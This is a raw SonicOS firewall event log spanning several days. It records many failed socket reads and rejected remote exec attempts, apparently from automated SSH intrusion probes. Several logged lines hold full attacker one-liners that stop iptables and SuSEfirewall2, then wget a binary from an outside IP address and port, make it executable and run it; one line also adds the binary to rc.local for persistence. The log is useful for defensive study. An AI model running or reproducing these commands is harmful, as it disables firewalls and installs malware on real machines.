Current:
log core 00: num exceptions 0, state events logged 0, missed 0 - critical events logged 1043, missed 0
-------critial (non-wrapping) log:
01/21 15:12:22.400: startup - *** warmboot ***
01/21 15:12:30.240: CRITICAL - Informational: validatePolicyManagement:1829: 
01/21 15:12:30.240: CRITICAL - An invalid WAN to LAN policy for Any -> Server_183 Services from Any to Server_183 Public was disabled: Can't mix management / non-management services
01/21 15:12:30.368: CRITICAL - Informational: validatePolicyManagement:1829: 
01/21 15:12:30.368: CRITICAL - An invalid DMZ to LAN policy for Any -> Server_183 Services from Any to Server_183 Public was disabled: Can't mix management / non-management services
01/21 15:12:31.240: CRITICAL - Informational: paramUpdateSslvpnServerCertName:19005: 
01/21 15:12:31.240: CRITICAL - failed to init a temp sslvpn ctx
01/21 15:12:31.416: CRITICAL - Informational: netObjPostImportChecks:5658: 
01/21 15:12:31.416: CRITICAL - Number of NAC Profile objects after import (5) does not match the number imported (0) !!!
01/21 15:12:57.000: CRITICAL - Informational: wdTaskInit:517: 
01/21 15:12:57.000: CRITICAL - Hardware watchdog time (5368 ms) is less than expectation (20000 ms)
01/21 15:56:30.640: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/21 16:39:37.224: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/21 19:07:39.944: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/22 02:51:37.016: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/22 02:52:40.256: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/22 05:44:00.432: fatal - Read from socket failed: errno = 0x3c, connection_in 42
01/22 06:02:17.224: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/22 08:32:38.000: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/22 09:42:34.368: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/22 10:52:52.576: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/22 11:56:19.384: fatal - Read from socket failed: errno = 0x3a, connection_in 45
01/22 12:20:32.752: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/22 14:31:28.528: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://104.223.72.141:280/lhhmzzqw;chmod 777 lhhmzzqw;./lhhmzzqw;'
01/22 14:33:24.720: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://104.223.72.141:280/lhhmzzqw;chmod 777 lhhmzzqw;./lhhmzzqw;'
01/22 14:43:34.112: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://104.223.72.141:280/lhhmzzqw;chmod 777 lhhmzzqw;./lhhmzzqw;'
01/22 15:22:43.832: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/22 15:27:47.016: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/22 15:37:50.832: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/22 15:57:24.224: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://104.223.72.141:280/lhhmzzqw;chmod 777 lhhmzzqw;./lhhmzzqw;'
01/22 17:42:51.560: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/23 03:52:32.576: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/23 07:15:36.304: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/23 10:01:25.720: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/23 10:49:29.000: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://104.223.72.141:280/lhhmzzqw;chmod 777 lhhmzzqw;./lhhmzzqw;'
01/23 10:51:26.864: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://104.223.72.141:280/lhhmzzqw;chmod 777 lhhmzzqw;./lhhmzzqw;'
01/23 11:01:51.816: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://104.223.72.141:280/lhhmzzqw;chmod 777 lhhmzzqw;./lhhmzzqw;'
01/23 12:22:57.736: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://104.223.72.141:280/lhhmzzqw;chmod 777 lhhmzzqw;./lhhmzzqw;'
01/23 13:53:46.832: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/23 13:54:19.624: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/23 14:50:20.032: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/23 14:55:49.400: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/23 15:46:36.912: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/23 15:58:02.144: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/23 17:55:00.352: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/23 18:07:01.064: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/23 19:58:55.528: fatal - do_exec_no_pty not supported in SonicOS command 'uname'
01/23 20:33:30.480: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/23 21:20:43.784: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/23 22:07:54.496: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/23 22:55:09.368: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/23 23:42:22.256: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/24 00:36:14.416: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/24 05:12:00.032: fatal - Read from socket failed: errno = 0x3c, connection_in 33
01/24 06:50:30.560: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/24 07:12:08.240: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/24 09:28:35.144: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/24 14:45:30.944: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/24 16:29:14.240: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/24 21:55:37.816: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/24 21:57:10.512: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/25 08:46:26.464: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/25 13:02:35.272: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/25 20:37:28.368: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/25 21:57:16.608: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/26 04:37:37.624: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/26 04:46:06.768: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/26 10:28:45.080: fatal - do_exec_no_pty not supported in SonicOS command '/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://23.234.30.41:2299/c891;chmod 777 c891;./c891;echo "cd /tmp/">>/etc/rc.local;echo "./c891&">>/et
01/26 13:38:45.672: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/26 17:17:27.880: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/26 18:00:37.016: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/26 18:38:57.624: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/26 19:32:56.912: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/27 06:00:15.208: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/27 06:01:01.592: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/27 12:24:50.320: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/27 18:22:42.880: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/27 18:28:10.704: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/27 19:08:55.816: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/28 01:51:29.544: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/28 14:17:41.240: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/28 14:39:39.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:39:46.656: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:39:56.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:40:03.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:40:10.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:40:20.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:40:29.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:40:38.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:40:46.368: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:40:54.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:41:02.336: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:41:09.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:41:17.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:41:24.304: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:41:32.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:41:37.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:41:43.656: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:41:50.368: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:41:56.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:42:01.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:42:07.048: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:42:12.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:42:18.672: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:42:24.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:42:29.720: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:42:34.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:42:40.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:42:45.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:42:50.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:42:55.832: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:43:01.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:43:07.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:43:18.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:43:23.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:43:33.832: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:43:39.640: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:43:44.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:43:50.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:43:55.368: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:44:01.624: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:44:06.016: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:44:12.048: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:44:16.672: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:44:22.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:44:27.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:44:33.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:44:39.400: fatal - Read from socket failed: errno = 0x3a, connection_in 42
01/28 14:44:44.656: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:44:50.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:44:55.688: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:45:01.288: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:05.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:11.896: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:16.368: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:22.784: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:27.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:32.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:38.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:45.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:50.048: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:54.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:45:59.816: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:46:05.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:46:10.672: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:46:16.016: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:46:23.912: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:46:30.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:46:37.832: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:46:45.048: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:46:50.544: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:46:56.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:47:01.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:47:06.848: fatal - Read from socket failed: errno = 0x3a, connection_in 42
01/28 14:47:12.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:47:18.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:47:25.368: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:47:32.016: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:47:38.048: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:47:42.304: fatal - Read from socket failed: errno = 0x3a, connection_in 42
01/28 14:47:47.816: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:47:53.336: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:47:58.656: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:48:04.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:48:09.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:48:14.832: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:48:20.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:48:25.272: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:48:31.560: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:48:38.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:48:41.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:48:48.736: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:48:52.752: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:48:58.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:49:03.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:49:09.064: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:49:20.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:49:26.880: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:49:32.720: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:49:39.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:49:45.944: fatal - Read from socket failed: errno = 0x3a, connection_in 42
01/28 14:49:50.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:49:56.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:50:02.256: fatal - Read from socket failed: errno = 0x3a, connection_in 42
01/28 14:50:07.752: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:50:13.176: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:50:18.496: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:50:25.672: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:50:33.160: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:50:40.160: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:50:47.304: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:50:54.496: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:51:03.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:51:08.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:51:13.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:51:18.208: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:51:25.368: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:51:30.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:51:37.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:51:41.384: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:51:47.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:51:53.688: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:51:58.832: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:52:04.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:52:09.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:52:14.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:52:19.896: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:52:27.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:52:31.816: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:52:36.288: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:52:44.096: fatal - Read from socket failed: errno = 0x3a, connection_in 42
01/28 14:52:52.224: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:53:01.720: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:53:08.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:53:14.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:53:21.880: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:53:29.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:53:36.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:53:44.288: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:53:49.400: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:53:55.240: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:54:00.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:54:05.576: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:54:11.784: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:54:19.752: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:54:27.224: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:54:33.720: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:54:41.160: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:54:48.880: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:54:54.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:55:02.736: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:55:09.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:55:16.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:55:24.928: fatal - Read from socket failed: errno = 0x3a, connection_in 42
01/28 14:55:31.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:55:39.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:55:46.288: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:55:53.688: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:56:02.672: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:56:09.256: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:56:15.752: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:56:23.128: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:56:30.624: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:56:38.512: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:56:45.672: fatal - Read from socket failed: errno = 0x3a, connection_in 42
01/28 14:56:52.768: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:57:00.128: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:57:08.080: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:57:14.592: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:57:21.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:57:29.480: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:57:37.448: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:57:44.128: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:57:51.608: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:57:59.320: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 14:58:06.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:58:13.800: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:58:21.800: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:58:28.016: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:58:35.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:58:42.288: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:58:49.624: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:58:57.624: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:59:04.464: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:59:12.432: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:59:19.304: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:59:27.016: fatal - Read from socket failed: errno = 0x3a, connection_in 42
01/28 14:59:33.944: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:59:41.288: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:59:49.048: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 14:59:56.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:00:03.832: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:00:11.736: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:00:18.352: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:00:26.432: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 15:00:34.336: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:00:40.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:00:47.832: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:00:55.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:01:02.368: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:01:09.512: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:01:17.544: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 15:01:31.672: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:01:39.192: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:01:46.528: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:01:54.112: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:02:02.608: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:02:09.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:02:16.032: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:02:23.480: fatal - Read from socket failed: errno = 0x3a, connection_in 33
01/28 15:02:30.848: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:02:38.336: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:02:46.144: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:02:53.128: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:03:00.256: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:03:08.320: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:03:15.096: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:03:22.416: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:03:29.880: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:03:44.928: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:03:51.544: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:03:58.896: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:04:06.560: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:04:13.864: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:04:21.240: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:04:28.928: fatal - do_exec_no_pty not supported in SonicOS command '(null)'
01/28 15:41:45.272: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/28 18:01:56.496: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/28 18:53:05.160: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/28 20:07:00.576: fatal - Read from socket failed: errno = 0x36, connection_in 45
01/28 20:10:15.416: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/28 22:21:43.128: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/29 00:38:43.000: fatal - Read from socket failed: errno = 0x3a, connection_in 42
01/29 00:50:15.496: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/29 03:42:25.528: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/29 12:04:07.208: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/29 16:14:57.544: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/29 17:10:49.272: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/29 17:12:16.544: fatal - Read from socket failed: errno = 0x36, connection_in 45
01/29 17:12:42.896: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/29 18:05:37.896: fatal - do_exec_no_pty not supported in SonicOS command 'echo -n test'
01/30 02:26:50.160: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/30 12:04:43.192: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/30 14:21:12.848: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/30 14:52:55.512: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/30 16:07:58.528: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/30 17:40:48.480: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/30 19:57:43.832: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/30 22:48:46.608: fatal - do_exec_no_pty not supported in SonicOS command 'uname'
01/31 01:28:45.624: fatal - Read from socket failed: errno = 0x3c, connection_in 33
01/31 02:07:10.640: fatal - Read from socket failed: errno = 0x36, connection_in 33
01/31 02:53:03.816: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/31 03:34:33.656: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/31 04:00:07.464: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/31 04:50:56.736: fatal - Read from socket failed: errno = 0x36, connection_in 42
01/31 05:13:25.304: fatal - do_exec_no_pty not supported in SonicOS command '/sbin/ifconfig'
01/31 10:06:27.272: fatal - Read from socket failed: errno = 0x36, connection_in 33
